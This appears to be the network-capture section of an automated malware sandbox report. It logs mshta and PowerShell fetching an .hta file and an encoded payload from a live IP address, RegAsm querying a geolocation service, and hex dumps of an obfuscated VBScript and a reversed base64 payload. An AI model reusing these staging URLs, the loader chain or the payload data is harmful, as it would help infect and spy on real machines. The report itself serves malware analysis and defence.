                                                                                                                                                                              Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 61 00 6c 00 6d 00 65 00 63 00 65 00 67 00 75 00 65 00 69 00 72 00 61 00 28 00 66 00 6c 00 75 00 63 00 74 00 75 00 61 00 64 00 6f 00 72 00 2c 00 20 00 64 00 65 00 73 00 76 00 61 00 72 00 69 00 61 00 72 00 2c 00 20 00 6d 00 69 00 6c 00 69 00 63 00 69 00 61 00 6e 00 6f 00 2c 00 20 00 6d 00 6f 00 61 00 6e 00 73 00 61 00 2c 00 20 00 68 00 65 00 6d 00 69 00 61 00 74 00 72 00 6f 00 70 00 68 00 69 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 0d 00 0a 00 20 00 [TRUNCATED]
                                                                                                                                                                              Data Ascii: private function almecegueira(fluctuador, desvariar, miliciano, moansa, hemiatrophia) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if miliciano.ArgumentExists(NPARA_FILTER) then filter = miliciano.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if miliciano.ArgumentExists(NPARA_DIALECT) then dialect = miliciano.Argument(NPAR
                                                                                                                                                                              Oct 14, 2024 11:05:55.479309082 CEST1236INData Raw: 00 41 00 5f 00 44 00 49 00 41 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 49 00 66 00 20 00 4c 00 43 00 61 00 73
                                                                                                                                                                              Data Ascii: A_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/wbem/ws
                                                                                                                                                                              Oct 14, 2024 11:05:55.479330063 CEST1236INData Raw: 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 20 00 4e 00 61 00 6d 00 65 00 3d 00 27 00 22 00 20 00 26 00 20 00 45 00 73 00 63 00 61
                                                                                                                                                                              Data Ascii: filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next fil
                                                                                                                                                                              Oct 14, 2024 11:05:55.479341984 CEST1236INData Raw: 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 49 00 4c 00 54 00 45 00 52 00 20 00 26 00 20 00 22 00 20 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72
                                                                                                                                                                              Data Ascii: L false, "-" & NPARA_FILTER & " parameter is required for the given dialect" End If If (miliciano.Argum
                                                                                                                                                                              Oct 14, 2024 11:05:55.479356050 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6d 00 69 00 6c 00 69 00 63 00 69 00 61 00 6e 00 6f 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 52 00 45 00 54
                                                                                                                                                                              Data Ascii: if miliciano.ArgumentExists(NPARA_RETURN_TYPE) then select case LCase(miliciano.Argument(NPARA_RETURN_TYPE))
                                                                                                                                                                              Oct 14, 2024 11:05:55.479439974 CEST1236INData Raw: 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 53 00 48 00 41 00 4c 00 4c 00 4f 00 57 00 29 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 66 00 6c
                                                                                                                                                                              Data Ascii: (NPARA_SHALLOW)) then flags = flags OR fluctuador.EnumerationFlagHierarchyShallow elseif (miliciano.Argumen
                                                                                                                                                                              Oct 14, 2024 11:05:55.479453087 CEST776INData Raw: 00 74 00 65 00 72 00 2c 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 2c 00 20 00 66 00 6c 00 61 00 67 00 73 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20
                                                                                                                                                                              Data Ascii: ter, dialect, flags) end if end if ASSERTERR desvariar, hemiatrophia on error goto 0 i
                                                                                                                                                                              Oct 14, 2024 11:05:55.479464054 CEST1236INData Raw: 00 75 00 6c 00 74 00 73 00 22 00 22 00 3e 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 6f 00 20 00 77 00 68 00 69 00 6c 00 65 00 20
                                                                                                                                                                              Data Ascii: ults"">" end if do while Not e.AtEndOfStream on error resume next res = e.ReadItem()
                                                                                                                                                                              Oct 14, 2024 11:05:55.479475975 CEST1236INData Raw: 00 78 00 74 00 2c 00 68 00 65 00 6d 00 69 00 61 00 74 00 72 00 6f 00 70 00 68 00 69 00 61 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 78 00 69 00 74 00 20 00 64
                                                                                                                                                                              Data Ascii: xt,hemiatrophia) then exit do end if wscript.echo formattedText loop
                                                                                                                                                                              Oct 14, 2024 11:05:55.479487896 CEST1236INData Raw: 00 3d 00 20 00 22 00 63 00 42 00 4f 00 4e 00 62 00 57 00 63 00 72 00 50 00 68 00 4b 00 57 00 6b 00 62 00 4e 00 22 00 0d 00 0a 00 57 00 6c 00 52 00 69 00 68 00 66 00 70 00 69 00 69 00 64 00 65 00 68 00 65 00 5a 00 6b 00 20 00 3d 00 20 00 22 00 52
                                                                                                                                                                              Data Ascii: = "cBONbWcrPhKWkbN"WlRihfpiideheZk = "RtiPBpkUpLfiAhC"GkGNoichZpomGhi = "GlfOeNnALjeCLaU"lPLfimsZhWfKZeK = "LKaux
                                                                                                                                                                              Oct 14, 2024 11:05:55.484317064 CEST1236INData Raw: 00 42 00 72 00 4b 00 7a 00 55 00 4b 00 48 00 70 00 4c 00 4b 00 4f 00 74 00 4c 00 48 00 20 00 3d 00 20 00 22 00 70 00 47 00 70 00 50 00 4c 00 5a 00 65 00 78 00 4c 00 70 00 53 00 63 00 74 00 4c 00 6f 00 22 00 0d 00 0a 00 6b 00 69 00 6b 00 7a 00 71
                                                                                                                                                                              Data Ascii: BrKzUKHpLKOtLH = "pGpPLZexLpSctLo"kikzqoNxuLnWQcd = "eALPZWhoPGLKWLh"ckRWuKiZfzBiBRR = "kiceCLPAULWxatacadistaW"ULk


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.2249171192.3.220.40802764C:\Windows\System32\mshta.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 14, 2024 11:06:05.920476913 CEST478OUTGET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              If-Modified-Since: Mon, 14 Oct 2024 05:15:53 GMT
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Host: 192.3.220.40
                                                                                                                                                                              If-None-Match: "28fda-62468ee52a080"
                                                                                                                                                                              Oct 14, 2024 11:06:06.411955118 CEST275INHTTP/1.1 304 Not Modified
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:06 GMT
                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 05:15:53 GMT
                                                                                                                                                                              ETag: "28fda-62468ee52a080"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.2249172192.3.220.40803996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 14, 2024 11:06:08.902717113 CEST76OUTGET /450/RRFCCE.txt HTTP/1.1
                                                                                                                                                                              Host: 192.3.220.40
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Oct 14, 2024 11:06:09.398521900 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:09 GMT
                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 05:09:54 GMT
                                                                                                                                                                              ETag: "a1000-62468d8e12667"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 659456
                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                              Oct 14, 2024 11:06:09.398550034 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                                                              Oct 14, 2024 11:06:09.398572922 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                                                              Oct 14, 2024 11:06:09.398591995 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                                                                                              Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                                                              Oct 14, 2024 11:06:09.398614883 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                                                                                                              Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                                                                                                              Oct 14, 2024 11:06:09.398629904 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                                                                                                                                              Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                                                                                                                                              Oct 14, 2024 11:06:09.398646116 CEST1236INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                                                                                                                                              Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                                                                                                                                              Oct 14, 2024 11:06:09.398662090 CEST1236INData Raw: 34 51 4f 7a 6e 6a 37 35 6b 65 4f 65 6e 6a 77 35 30 61 4f 4a 6d 44 68 35 38 58 4f 30 6c 44 57 35 51 54 4f 48 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42
                                                                                                                                                                              Data Ascii: 4QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82M
                                                                                                                                                                              Oct 14, 2024 11:06:09.398677111 CEST1236INData Raw: 58 54 77 7a 63 69 4d 6d 4c 54 78 79 45 71 4d 61 4b 54 6c 79 55 53 4d 70 42 6a 6d 41 41 41 41 41 42 41 42 41 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a
                                                                                                                                                                              Data Ascii: XTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODM
                                                                                                                                                                              Oct 14, 2024 11:06:09.398693085 CEST1236INData Raw: 55 4b 4d 66 43 54 6d 77 4d 4a 4d 4f 43 44 69 77 49 49 4d 38 42 7a 64 77 45 48 4d 72 42 54 5a 77 41 47 4d 61 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a 44 77 6b 41 4d 45 41 41 41 42 67 45
                                                                                                                                                                              Data Ascii: UKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx80LP3yTs8AKP
                                                                                                                                                                              Oct 14, 2024 11:06:09.403470993 CEST1236INData Raw: 73 7a 41 36 38 76 4f 37 72 7a 39 36 4d 76 4f 6a 72 6a 7a 36 77 72 4f 79 71 44 71 36 77 6f 4f 39 70 6a 62 36 63 6d 4f 64 70 7a 55 36 6b 6b 4f 2f 6f 54 4e 36 49 51 4f 70 6e 7a 30 35 6f 62 4f 7a 6d 7a 70 35 41 61 4f 5a 6d 7a 62 35 55 57 4f 65 6c 7a
                                                                                                                                                                              Data Ascii: szA68vO7rz96MvOjrjz6wrOyqDq6woO9pjb6cmOdpzU6kkO/oTN6IQOpnz05obOzmzp5AaOZmzb5UWOelzV5AVOJlTF5sQOEgDz4UMOnizi4oHAAAAcAIAgAAAA5MbOsmDo5kZOOmzh58XOtlTX5YVOKlzQ5UTOukjJ5QROEgT/4EPOqjD34UNONjzu4sKOkiDm4EJODiDf4QHOidDs3M6NVejg3M3N/cTM3AyNLYzu24qNgaTj


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.2249175178.237.33.50801884C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 14, 2024 11:06:14.087153912 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                              Host: geoplugin.net
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Oct 14, 2024 11:06:14.701910019 CEST1170INHTTP/1.1 200 OK
                                                                                                                                                                              date: Mon, 14 Oct 2024 09:06:14 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              content-length: 962
                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.2249177192.3.220.40803732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 14, 2024 11:06:24.824851036 CEST76OUTGET /450/RRFCCE.txt HTTP/1.1
                                                                                                                                                                              Host: 192.3.220.40
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Oct 14, 2024 11:06:25.330331087 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:25 GMT
                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 05:09:54 GMT
                                                                                                                                                                              ETag: "a1000-62468d8e12667"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 659456
                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
